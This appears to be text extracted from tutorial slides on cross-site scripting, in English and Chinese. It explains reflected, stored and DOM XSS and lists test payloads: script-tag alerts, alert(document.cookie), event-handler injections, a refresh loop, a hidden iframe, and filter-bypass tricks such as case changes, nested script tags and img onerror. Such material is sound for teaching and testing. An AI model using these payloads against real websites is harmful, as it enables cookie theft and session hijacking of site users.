<script>alert('xss')</script>
Introduction to XSS - Principle
Attackers inject malicious script code into web pages, wait for other users to browse
these pages (or trigger other conditions), and execute the malicious code in them.
Use XSS to pop up a malicious warning box
<script>alert('xss')</script>
web page keeps refreshing
<meta http-equiv='refresh'content='0'>
Embed other website connection
<iframe src=http:// 127.0.0.1 width=0 height=0></iframe>
Introduction to XSS – Hazard
stealing user cookies, posing as a user to enter the website to
steal various user accounts
, hijacking user calls, performing arbitrary operations to
swipe traffic, and executing pop-up advertisements
to spread worms
Introduction to XSS – Classification
1. Reflective type
generally does not enter the server
Features: non-persistent, parameter cross-site scripting
Function: call user cookie or perform phishing
2. Storage type
enters the server
Features: persistent, more harmful
effect: penetration , hanging horses, worms, phishing
3. Dom-type
new xss vulnerabilities, based on js
can be attributed to reflective xss
1. Reflected Cross-site Scripting (Reflected Cross-site Scripting)
is also known as non-persistent, parametric XSS. It is the most common type and the most widely used one. It
is mainly used to append malicious scripts to the parameters of URL addresses.
http://127.0.0.1/search?php?key=“><script>alert(1)</script>
http://127.0.0.1/test.php?name=<iframe src=javascript:alert(1)>11
Testing for Reflected XSS Attacks
(1) Check the code to find the key variable. If the variable is not processed by htmlEncode, then this variable has an XSS vulnerability
(2) Prepare the test script, see the last few pictures for more scripts
<script>alert(document.cookie)</script> <script>alert(1)</script>
<script>alert(document.cookie)< /script><!--
"onclick="alert(document.cookie) "onclick="alert(1)
2. 存储型XSS(Stored Cross-site Scripting)
也称做持久型XSS(Persistend Cross-site Scripting),比反射性
XSS更具有威胁性。
攻击者事先将恶意JavaScript代码上传或存储到漏洞服务器中,只要
受害者浏览包含此恶意JavaScript代码的页面就会执行恶意代码。
存储型XSS一般出现在网站留言、评论、博客日志等交互处,恶意脚
本被存储到客户端或服务器的数据库中
几种绕过方法
<script>alert(1)</script>
message = htmlspecialchars( $message );
$name = str_replace( '<script>', '', $name );当使用htmlspecialchars时 不能用但可以通过
name = str_replace( '<script>', '', $name
Message由于使用了htmlspecialchars方法对用户输入数据进行编码转换,因此不存在xss漏洞。
但是name由于仅仅用了str_replace方法把<script>替换为空,于是我们有以下三种方法来绕过:
非<script>标签: <img src=0 onerror=alert(/xss1/)>
大小写转换:<Script>alert(/xss2/)</sCript>
双重<script>标签:<sc<script>ript>alert(/xss3/)</script>
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
preg_replace执行一个正则表达式的搜索和替换,此时可以使用别的标签<img> <a> <iframe>等,比如刚刚使用过的<img>,构造payload :<img src=0 onerror=alert(/xss/)>,
改包替换绕过,成功执行xss代码: